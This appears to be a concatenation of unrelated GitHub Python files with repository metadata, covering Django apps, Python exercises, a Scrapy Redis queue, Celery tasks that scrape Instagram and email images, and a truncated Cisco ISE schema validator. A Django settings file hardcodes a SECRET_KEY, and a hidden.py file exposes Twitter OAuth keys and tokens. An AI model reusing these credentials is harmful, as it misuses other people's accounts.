153e2afd35e596d691f24b7f0b289bd2cfa4307c
|
449b2889900cf2ec285ae2309d07fac31f286234
|
/sms/urls.py
|
d90f7027541f609b2332719cb12c53b3b73508ed
|
[
"MIT"
] |
permissive
|
xchoudhury/twilio_app
|
05b3ed8e58b14b5ea95997e8e0315738d5b07aac
|
c06ae7dc27f46d9a0af78b3f1fc9dc8a51cf81f7
|
refs/heads/master
| 2022-12-13T03:52:54.335870
| 2017-06-28T02:43:46
| 2017-06-28T02:43:46
| 95,335,969
| 0
| 0
| null | 2022-12-07T23:57:40
| 2017-06-25T03:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(
r'^sms/send/$',
views.send_sms,
name='send_sms'
),
url(
r'^sms/receive/$',
views.receive_sms,
name='receive_sms'
),
]
|
[
"xchoudhury@gmail.com"
] |
xchoudhury@gmail.com
|
f148e707e28d61acb86229973a9fea7274e78d5c
|
b47e307ebb4b76d4cb15feab2d952df037abf6b5
|
/pyexercises/b_019.py
|
ba350e14ae5f28c9ca4cb73bd53fabd49762c27a
|
[] |
no_license
|
wiccawill420/pybites
|
50964bb102600c02a2ccd5bf8aab2069a14db0c8
|
59c87c36d6daf016057b8890724267df1a7e41d6
|
refs/heads/master
| 2022-11-27T20:21:06.089961
| 2020-07-31T20:03:23
| 2020-07-31T20:03:23
| 283,005,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from datetime import datetime, timedelta
import inspect
NOW = datetime.now()
class Promo:
def __init__(self, name, expires):
self.name = name
self.expires = expires
@property
def expired(self):
        return self.expires < NOW
def test_promo_expired():
past_time = NOW - timedelta(seconds=3)
twitter_promo = Promo('twitter', past_time)
assert twitter_promo.expired
def test_promo_not_expired():
future_date = NOW + timedelta(days=1)
newsletter_promo = Promo('newsletter', future_date)
# print(newsletter_promo.__dict__)
# print(newsletter_promo.expired())
assert not newsletter_promo.expired
def test_uses_property():
assert 'property' in inspect.getsource(Promo)
# test_promo_not_expired()
test_uses_property()
|
[
"william.lynn.1337@gmail.com"
] |
william.lynn.1337@gmail.com
|
5824a5d8555db04a2932bb992498a6649742e9e3
|
2169c394afe2c00a3d593433925083daa15e504e
|
/lesson5/zd5_3.py
|
92ee543bbb4e84a24f07471c336dd53ddec733ed
|
[] |
no_license
|
Lexa07/Lesson
|
89bc464ed6ee07661eec7c08e11dfdb80c56a1bc
|
0357002ea0a76eb46149de68d7c33b61b7a9d6d4
|
refs/heads/lesson1
| 2023-03-10T09:22:06.280934
| 2021-02-13T10:38:42
| 2021-02-13T10:38:42
| 330,971,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,068
|
py
|
"""
3. Create a text file (by hand, not programmatically) and write employees'
surnames and their salaries to it line by line. Determine which employees
earn less than 20 thousand and print their surnames.
Compute the average income of the employees.
"""
from functools import reduce
def func_my(el_1, el_2):
return float(el_1) + float(el_2)
with open("text_3.txt", "r") as mytext:
my_list = []
    zp = 20000  # salary threshold kept in one place so it is easy to change
for line in mytext:
worker = line.split(' ')
my_list.append(worker[1])
if float(worker[1]) < zp:
print(worker[0])
i = len(my_list)
mnog = reduce(func_my, my_list)
print(f"Средняя заработная плата сотрудников: {mnog / i} рублей.")
|
[
"latyw07@mail.ru"
] |
latyw07@mail.ru
|
7dd1c492f62f77a8e944c442208db313fcff19a4
|
3f5f52b37f7aca332c5cbca0a06ff33685f20c5b
|
/sf_record_spider/distribute_util/request_queue.py
|
5d85e435d1193babf6995725a6c3e80efdb81713
|
[] |
no_license
|
lxs137/py_house_spider
|
197a9f3353bbf640dfae07c14e2ad914d6a4801f
|
9a39aa78628c7ffb39647d301e94f6a2d4bbbd17
|
refs/heads/master
| 2021-01-11T15:37:24.984631
| 2017-12-22T01:13:46
| 2017-12-22T01:13:46
| 79,902,824
| 4
| 2
| null | 2017-07-24T05:18:36
| 2017-01-24T10:50:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
from scrapy.utils.reqser import request_from_dict, request_to_dict
import pickle
from redis import Redis
class RedisRequestQueue(object):
def __init__(self, server, spider, queue_key):
self.server = server
self.spider = spider
self.key = queue_key
def _decode_request(self, request_data):
return request_from_dict(pickle.loads(request_data), self.spider)
def _encode_request(self, request):
        # protocol=-1 means pickle uses HIGHEST_PROTOCOL
return pickle.dumps(request_to_dict(request, self.spider), protocol=-1)
def __len__(self):
return self.server.zcard(self.key)
def close(self, reason):
self.server.delete(self.key)
def pop(self):
pipe = self.server.pipeline()
        # Make sure the following commands execute as a single transaction
pipe.multi()
pipe.zrange(self.key, 0, 0)
pipe.zremrangebyrank(self.key, 0, 0)
value, count = pipe.execute()
if value:
return self._decode_request(value[0])
def push(self, request):
request_data = self._encode_request(request)
        # For a request, a larger priority value means higher priority,
        # but in a Redis sorted set a lower score ranks first by default,
        # so -request.priority is used as the member's score.
self.server.zadd(self.key, request_data, -request.priority)
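
# Illustrative usage (a sketch, not part of the original module; the Redis
# connection, spider and request objects below are assumptions):
#
#     queue = RedisRequestQueue(Redis(host='localhost'), spider, 'spider:requests')
#     queue.push(request)  # request.priority 10 is stored with score -10
#     req = queue.pop()    # the highest-priority request comes back first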
|
[
"lxs137@hotmail.com"
] |
lxs137@hotmail.com
|
f5534aa8a51ae46e08d79ac732c13842a87749aa
|
0653d222b1679fd3d3616c6f6f34804f465d2b56
|
/tests/test_ls_algo.py
|
fb6f4e3b3cd4d2839a809556b88162ceb38d5033
|
[] |
no_license
|
DaddyTrap/SocketRouter
|
e310b6798184f75a24fbd9c59767b4ad9e7a4f69
|
d0b2ad314e2b485eba752f0809267c991f4c9432
|
refs/heads/master
| 2021-09-01T18:40:40.043678
| 2017-12-28T08:33:35
| 2017-12-28T08:33:35
| 112,981,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
import route_node.route_node as route_node
forward_table = {}
topo = {
1: {
1: 0,
3: 20,
4: 10
},
3: {
1: 20,
4: 5,
5: 5
},
4: {
1: 10,
3: 5,
5: 5
},
5: {
3: 5,
4: 5
}
}
ret = route_node.LSRouteNode.ls_algo(1, topo, forward_table)
print(forward_table)
|
[
"914670787@qq.com"
] |
914670787@qq.com
|
2f9655fa112df5ca5906905afbc0c4fbf062d7d9
|
51d0377511a5da902033fb9d80184db0e096fe2c
|
/05-importing-data-in-python-1/2-importing-data-from-other-files-types/04-customizing-your-spreadsheet-import.py
|
d70b70184020466e1f5cc0e4109a2a15e2713f58
|
[] |
no_license
|
sashakrasnov/datacamp
|
c28c6bda178163337baed646220b2f7dcc36047d
|
759f4cec297883907e21118f24a3449d84c80761
|
refs/heads/master
| 2021-12-07T02:54:51.190672
| 2021-09-17T21:05:29
| 2021-09-17T21:05:29
| 157,093,632
| 6
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
'''
Customizing your spreadsheet import
Here, you'll parse your spreadsheets and use additional arguments to skip rows, rename columns and select only particular columns.
The spreadsheet 'battledeath.xlsx' is already loaded as xl.
As before, you'll use the method parse(). This time, however, you'll add the additional arguments skiprows, names and parse_cols. These skip rows, name the columns and designate which columns to parse, respectively. All these arguments can be assigned to lists containing the specific row numbers, strings and column numbers, as appropriate.
Instructions
* Parse the first sheet by index. In doing so, skip the first row of data and name the columns 'Country' and 'AAM due to War (2002)' using the argument names. The values passed to skiprows and names all need to be of type list.
* Parse the second sheet by index. In doing so, parse only the first column with the parse_cols parameter, skip the first row and rename the column 'Country'. The argument passed to parse_cols also needs to be of type list.
'''
# Import pandas
import pandas as pd
# Assign spreadsheet filename: file
file = '../datasets/battledeath.xlsx'
# Load spreadsheet: xl
xl = pd.ExcelFile(file)
# Parse the first sheet and rename the columns: df1
df1 = xl.parse(0, skiprows=[0], names=['Country', 'AAM due to War (2002)'])
# Print the head of the DataFrame df1
print(df1.head())
# Parse the first column of the second sheet and rename the column: df2
df2 = xl.parse(1, parse_cols=[0], skiprows=[0], names=['Country'])
# Print the head of the DataFrame df2
print(df2.head())
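
# Note: `parse_cols` has since been deprecated in favour of `usecols` in
# later pandas releases, so on a current install the second parse would be:
# df2 = xl.parse(1, usecols=[0], skiprows=[0], names=['Country'])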
|
[
"a@skrasnov.com"
] |
a@skrasnov.com
|
2078df2066e4dc94d84e50fde4a6a7c9bae43fd2
|
82b728e805d887102c0b8c415731b353877690cd
|
/samples/generated_samples/aiplatform_generated_aiplatform_v1_metadata_service_purge_artifacts_async.py
|
be1cc40f02347804f3d7ccef30143cd4d9744042
|
[
"Apache-2.0"
] |
permissive
|
geraint0923/python-aiplatform
|
90c7742c9bdbde05b9688b117e8e59c0406d6f85
|
7ab05d5e127636d96365b7ea408974ccd6c2f0fe
|
refs/heads/main
| 2023-08-24T05:30:38.519239
| 2021-10-27T20:38:25
| 2021-10-27T20:38:25
| 370,803,114
| 0
| 0
|
Apache-2.0
| 2021-05-25T19:15:47
| 2021-05-25T19:15:46
| null |
UTF-8
|
Python
| false
| false
| 1,725
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for PurgeArtifacts
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1_MetadataService_PurgeArtifacts_async]
from google.cloud import aiplatform_v1
async def sample_purge_artifacts():
"""Snippet for purge_artifacts"""
# Create a client
client = aiplatform_v1.MetadataServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1.PurgeArtifactsRequest(
parent="projects/{project}/locations/{location}/metadataStores/{metadata_store}/artifacts/{artifact}",
filter="filter_value",
)
# Make the request
operation = client.purge_artifacts(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
print(response)
# [END aiplatform_generated_aiplatform_v1_MetadataService_PurgeArtifacts_async]
|
[
"noreply@github.com"
] |
geraint0923.noreply@github.com
|
caa7b6c37ddc4abe6bd02420da52258d8a58eddd
|
1f1a1e9b595cbd1dfcba4435658eab3bbbcbda82
|
/core/settings.py
|
187d7ce051ffb03d1dc011156722ff499b82deea
|
[] |
no_license
|
Juju-And/twitter
|
b910f222e965f342d173bb7c163f6ab469473edc
|
325530bf0dd35c799ff945930bdfb32f4e03429c
|
refs/heads/master
| 2020-09-15T23:03:16.400640
| 2019-11-23T17:01:28
| 2019-11-23T17:01:28
| 223,578,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,174
|
py
|
"""
Django settings for core project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-$ih564fx733-qjz!2l$gfxnl=c^b-0go-(%=f#-ey8_-azmn$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'records',
'whispers',
'users',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
"static"
]
|
[
"justyna.andrejczuk@gmail.com"
] |
justyna.andrejczuk@gmail.com
|
ae6a7f58779bac67a6b31a8b4e812919d06641ee
|
2ec6862beae3dc2f788ca66cce15ef8a6d2c9c3c
|
/preproc.py
|
d0064f9cf4b99462ad5a55d8abd9a740e5bfa098
|
[] |
no_license
|
jpmcd/vowpal-wabbit-works
|
8fa5eca43dab874d24b4f6384b39a7b1d6512763
|
e87122588b3ac34cd122092c252d3dee4327cecd
|
refs/heads/master
| 2021-01-24T20:41:50.650928
| 2016-02-03T17:35:35
| 2016-02-03T17:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 837
|
py
|
import re
import sys
import random
p = float(sys.argv[1])
if p < 0 or p > 1:
print "input valid p, 0<=p<=1"
exit()
w_bool = len(sys.argv) > 3  # weights are optional; avoids an IndexError when they are absent
if w_bool:
w_pos = float(sys.argv[2])
w_neg = float(sys.argv[3])
else:
w_pos = 1.
w_neg = 1.
train = open("train.dat","w")
test = open("test.dat","w")
for i in range(1):
with open("/scratch/url_svmlight/Day"+str(i)+".svm","r") as f:
for line in f:
newline = re.sub(r"^-1", "0 %f |f"%w_neg, line)
newline = re.sub(r"^\+1", "1 %f |f"%w_pos, newline)
newline = re.sub(r"$\s", " const:.01\n", newline)
rand = random.random()
if rand < p:
test.write(newline)
else:
train.write(newline)
#exit()
train.close()
test.close()
|
[
"josephpmcdonald@gmail.com"
] |
josephpmcdonald@gmail.com
|
af695ef76b65ad605049e07f2f5afdc8137d801f
|
93ba1198906bf36edfc5e62c28e11bb4db754186
|
/venv/bin/easy_install-3.7
|
bb3f99e47a67d63abbcd1e6a46b5b04a73747619
|
[] |
no_license
|
ccc-team44/tweet-analysis
|
5e44d146fccd82c9d844ed1bc91e9ce3bbdb39e2
|
7724b27c3fdb7167978cf1257d68a605dd7ead1d
|
refs/heads/master
| 2022-10-04T03:18:32.311770
| 2020-06-11T08:56:11
| 2020-06-11T08:56:11
| 264,067,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
7
|
#!/Users/xinweiding/tweet-analysis/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"xind1cl@gmail.com"
] |
xind1cl@gmail.com
|
b26ea98bc20a0e8e0521ec75161d78c8d31340d3
|
bbf02a2dfa11a8abb0ac8602a85b669a839c06cb
|
/caladonis/workouts/models.py
|
6380fb6f05bff21049651f358fa99aece348ea28
|
[] |
no_license
|
perezal/api.caladonis.com
|
7e48af60607c45cae125e17e36ba7f560ad25e1e
|
dce3e67d2a197980a82044cda3bdb19c03075192
|
refs/heads/master
| 2020-03-15T02:00:18.505023
| 2018-05-17T01:18:46
| 2018-05-17T01:18:46
| 131,907,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
from django.db import models
from django.contrib.auth.models import User
class Workout(models.Model):
account = models.ForeignKey(User, on_delete=models.CASCADE)
date = models.DateTimeField('workout date', auto_now_add=True)
notes = models.TextField(default='')
class Exercise(models.Model):
workout = models.ForeignKey(Workout, related_name="exercises", on_delete=models.CASCADE)
name = models.CharField(max_length=20)
class Set(models.Model):
exercise = models.ForeignKey(Exercise, related_name="sets", on_delete=models.CASCADE)
reps = models.IntegerField(default=0)
weight = models.IntegerField(default=0)
|
[
"redflare@gmail.com"
] |
redflare@gmail.com
|
2e84d8d5c0b440ec8f046db0a63b3cb5a11f5f7c
|
77945f2e1e3cfd2920ef3b71fa626d23d643c4f2
|
/code3/hidden.py
|
8c2d0b37e8f10e3b0f264c3b744da12e774ba69b
|
[] |
no_license
|
justingfoster/p4e
|
9226cf5a6972a0a2520c5696abef5cdc37a964a0
|
fdcb9db475498e24b7ef77b07c1a3c1688b87bb2
|
refs/heads/master
| 2021-01-01T15:32:53.733498
| 2017-09-19T16:02:18
| 2017-09-19T16:02:18
| 97,640,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Keep this file separate
# https://apps.twitter.com/
# Create new App and get the four strings
def oauth():
return {"consumer_key": "teFVNZ4kMr76wwb0q1D4AMTUZ",
"consumer_secret": "73RazktJRaJjlAPyOerMLGA47J1c83ZVYMWiQ76BMA1HyVhdjU",
"token_key": "892077162475421697-5rSinUKpLHPcmJkfgGtUcpcxyi51mmy",
"token_secret": "XbegLZ3M3YYHAWfJBwgV1UvPY1dsP913iL2SK05CGC88G"}
|
[
"justingfoster@hotmail.com"
] |
justingfoster@hotmail.com
|
6ca562dbf7053d70020705006ef520d4ed60caf0
|
1a75bf92c35eb51b0181862102afcf819a71ab23
|
/ig_review/tasks/__init__.py
|
ee1f7acabcbfb231dec485875da3f034142faabc
|
[] |
no_license
|
Skinner927/ig-review
|
867202b3e039dc9529930f0844be37103bb29ddb
|
192b4f07e76682771dd9fbdac83d6b42ebaf9011
|
refs/heads/master
| 2021-04-03T01:37:53.714115
| 2018-03-13T00:11:18
| 2018-03-13T00:11:18
| 124,973,337
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,574
|
py
|
"""
Run as:
celery worker -A ig_review.tasks -B
And debugging:
celery worker -A ig_review.tasks --loglevel=info -E -B
"""
# Be sure to use absolute module references or the celery worker may not work
from celery.signals import beat_init
from email.message import EmailMessage
from ig_review import factory
from ig_review.api.image_storage import RootImageStorage
from instagram_scraper import InstagramScraper
from pathlib import Path
import functools
import imghdr
import os
import os.path
import smtplib
app = factory.create_celery_app(__name__)
def single_instance_task(func):
"""
Decorator to prevent tasks from running at the same time.
Works independent of OS and process/thread.
:param func:
:return:
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
func_name = 'celerylock-' + func.__name__
lock_file = os.path.join(self.app.conf['LOCKFILE_DIR'], func_name)
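        # open() in 'x' mode creates the file exclusively and raises OSError
        # if it already exists, so only one worker can hold the lock at a time.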
try:
f = open(lock_file, 'x')
f.write(str(os.getpid()))
except OSError:
# Someone holds the lock, get out!
self.log.info('wanted to run but locked ' + func_name)
return
try:
return func(*args, **kwargs)
finally:
f.close()
os.remove(lock_file)
return wrapper
@app.on_after_configure.connect
def schedule_tasks(sender, **kwargs):
interval = 60.0 * float(sender.conf['SCRAPE_IG_INTERVAL'])
sender.add_periodic_task(interval, do_scrape.s(), name='Scrape IG at interval')
interval = 60.0 * float(sender.conf['SEND_IG_APPROVED'])
sender.add_periodic_task(interval, do_mail_images.s(), name='Send reviewed images')
@beat_init.connect
def kick_first_task(sender, **kwargs):
do_scrape.delay()
do_mail_images.delay()
@app.task(bind=True)
@single_instance_task
def do_scrape(self):
self.log.info('Scraping IG as ' + self.app.conf['SCRAPE_IG_USER'])
scraper = InstagramScraper(
login_user=self.app.conf['SCRAPE_IG_USER'],
login_pass=self.app.conf['SCRAPE_IG_PASS'],
usernames=self.app.conf['SCRAPE_IG_FRIENDS'],
destination=self.app.conf['IMAGES_REVIEW_DIR'],
retain_username=True,
media_types=['image', 'story-image'],
maximum=self.app.conf['SCRAPE_IG_MAX_PER_FRIEND'],
latest_stamps=os.path.join(self.app.conf['STORAGE_ROOT'], 'ig_user_stamps.ini'),
)
scraper.scrape()
self.log.info('Done scraping IG without errors as ' + self.app.conf['SCRAPE_IG_USER'])
@app.task(bind=True)
@single_instance_task
def do_mail_images(self):
if not self.app.conf['SEND_IG_SMTP_ENABLED']:
self.log.info('Sending images is disabled')
return
self.log.info('Starting to send images')
# Create a message
msg = EmailMessage()
msg['Subject'] = self.app.conf['SEND_IG_SMTP_SUBJECT']
msg['From'] = self.app.conf['SEND_IG_SMTP_FROM']
msg['To'] = ', '.join(self.app.conf['SEND_IG_SMTP_TO'])
# Get all images
img_dir = Path(self.app.conf['IMAGES_SEND_DIR'])
max_files = self.app.conf['SEND_IG_SMTP_MAX_ATTACHMENTS']
files_sent = 0
for file in img_dir.iterdir():
if files_sent >= max_files:
break
# Ensure they're legit
if not RootImageStorage.valid_image_file(file):
self.log.warning('Invalid image file in send directory ' + str(file))
os.remove(file)
continue
with open(file, 'rb') as f:
img_data = f.read()
msg.add_attachment(img_data,
maintype='image',
subtype=imghdr.what(None, img_data),
filename=os.path.basename(file))
files_sent += 1
if files_sent < 1:
self.log.info('No images to send')
return
# Create SMTP sender
with smtplib.SMTP(host=self.app.conf['SEND_IG_SMTP_HOST'],
port=self.app.conf['SEND_IG_SMTP_PORT']) as s:
secure = self.app.conf['SEND_IG_SMTP_SECURE']
        if isinstance(secure, tuple):
            kwargs = {}
            if len(secure) > 0:
                kwargs['keyfile'] = secure[0]
            if len(secure) == 2:
                kwargs['certfile'] = secure[1]
            s.starttls(**kwargs)
        elif secure:
            # A bare truthy value enables STARTTLS without an explicit
            # keyfile/certfile pair (len() would fail on a non-tuple).
            s.starttls()
if self.app.conf['SEND_IG_SMTP_USER']:
s.login(self.app.conf['SEND_IG_SMTP_USER'], self.app.conf['SEND_IG_SMTP_PASS'])
s.send_message(msg)
self.log.info('Done sending {} images without errors'.format(files_sent))
|
[
"skinner927@gmail.com"
] |
skinner927@gmail.com
|
bf6070165ba4c074e3b6f0ade42f7ef065fcf59b
|
57c5ce8c1bfafee2ea53347052f26d018a77c795
|
/alien.py
|
8698021bef75eb6543ebe0ffb9598ecfd025f069
|
[] |
no_license
|
core571/alien_invasion
|
24216c5a0ec19b32a4a266649ac4c9d59eab004e
|
6aeccbc4d472a48a3d8649d855e4a39fede5eb2e
|
refs/heads/master
| 2020-03-19T09:01:32.888150
| 2018-06-07T02:38:17
| 2018-06-07T02:38:17
| 136,254,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""表示单个外星人的类"""
def __init__(self, ai_settings, screen):
"""初始化外星人并设置其起始位置"""
super(Alien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
        # Load the alien image and set its rect attribute
self.image = pygame.image.load('images/alien.bmp')
self.rect = self.image.get_rect()
        # Each alien initially starts near the top-left corner of the screen
self.rect.x = self.rect.width
self.rect.y = self.rect.height
        # Store the alien's exact position
self.x = float(self.rect.x)
def blitme(self):
"""在指定位置绘制外星人"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
"""如果外星人位于屏幕边缘,就返回True"""
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
"""向左或向右移动外星人"""
self.x += (self.ai_settings.alien_speed_factor *
self.ai_settings.fleet_direction)
self.rect.x = self.x
|
[
"wqr571@outlook.com"
] |
wqr571@outlook.com
|
3e3460ed023a46892882b4db2f912938a5a5f08b
|
16bf89ec6848c78f4aad3e87b5e386bb86f92815
|
/Mypython-code-master/badasechota.py
|
0991fe952c0eaea211b90fa276f746abd7462462
|
[] |
no_license
|
95ankitmishra/Program-data_structure
|
bae865e72800ade5ed99feb516015820ac876805
|
fc2e9a09c5e382a718b44d9e1ee03cad3442f2f7
|
refs/heads/master
| 2020-06-17T22:18:02.785493
| 2019-07-09T21:00:53
| 2019-07-09T21:00:53
| 196,077,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
arr=[int(x) for x in input("enter elements").split(',')]
arr.sort()
arr.reverse()
print("bada se chota",arr)
|
[
"noreply@github.com"
] |
95ankitmishra.noreply@github.com
|
96a7799af3063690f59693c3545834464fa5aaaf
|
77178627b46d5b0440d64af70b88bdb91f5269ab
|
/blog/models.py
|
8872bbb7a55fa2a08875969e0b06b12647a011f3
|
[] |
no_license
|
daredavil01/blog-fastapi
|
a9f40835fdc9b42151fa049c0aab3f1a62e810da
|
4153a150c4380537d00f747b2445f4e183c34cb4
|
refs/heads/main
| 2023-06-26T07:24:12.830961
| 2021-07-31T14:50:24
| 2021-07-31T14:50:24
| 391,384,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from sqlalchemy import Column, Integer, String, ForeignKey
from blog.database import Base
from sqlalchemy.orm import relationship
class Blog(Base):
__tablename__ = 'blogs'
id = Column(Integer, primary_key=True, index=True)
title = Column(String)
body = Column(String)
user_id = Column(Integer, ForeignKey("users.id"))
creator = relationship("User", back_populates="blogs")
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True, index=True)
name = Column(String)
email = Column(String)
password = Column(String)
blogs = relationship("Blog", back_populates="creator")
|
[
"sanket.tambare01@gmail.com"
] |
sanket.tambare01@gmail.com
|
3ea536a721bb17fa0229848067424923e14c558e
|
4e30d990963870478ed248567e432795f519e1cc
|
/tests/models/validators/v3_1_patch_1/jsd_c0984cde5e925c209ab87472ab905476.py
|
c86e4452c3079233469acbb06dd25ed2dec223d4
|
[
"MIT"
] |
permissive
|
CiscoISE/ciscoisesdk
|
84074a57bf1042a735e3fc6eb7876555150d2b51
|
f468c54998ec1ad85435ea28988922f0573bfee8
|
refs/heads/main
| 2023-09-04T23:56:32.232035
| 2023-08-25T17:31:49
| 2023-08-25T17:31:49
| 365,359,531
| 48
| 9
|
MIT
| 2023-08-25T17:31:51
| 2021-05-07T21:43:52
|
Python
|
UTF-8
|
Python
| false
| false
| 8,186
|
py
|
# -*- coding: utf-8 -*-
"""Identity Services Engine getNetworkAccessConditionsForPolicySets data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorC0984Cde5E925C209Ab87472Ab905476(object):
"""getNetworkAccessConditionsForPolicySets request schema definition."""
def __init__(self):
super(JSONSchemaValidatorC0984Cde5E925C209Ab87472Ab905476, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"response": {
"items": {
"properties": {
"attributeName": {
"type": "string"
},
"attributeValue": {
"type": "string"
},
"children": {
"items": {
"properties": {
"conditionType": {
"enum": [
"ConditionAndBlock",
"ConditionAttributes",
"ConditionOrBlock",
"ConditionReference",
"LibraryConditionAndBlock",
"LibraryConditionAttributes",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"isNegate": {
"type": "boolean"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"enum": [
"next",
"previous",
"self",
"status"
],
"type": "string"
},
"type": {
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"type": "array"
},
"conditionType": {
"enum": [
"ConditionAndBlock",
"ConditionAttributes",
"ConditionOrBlock",
"ConditionReference",
"LibraryConditionAndBlock",
"LibraryConditionAttributes",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"datesRange": {
"properties": {
"endDate": {
"type": "string"
},
"startDate": {
"type": "string"
}
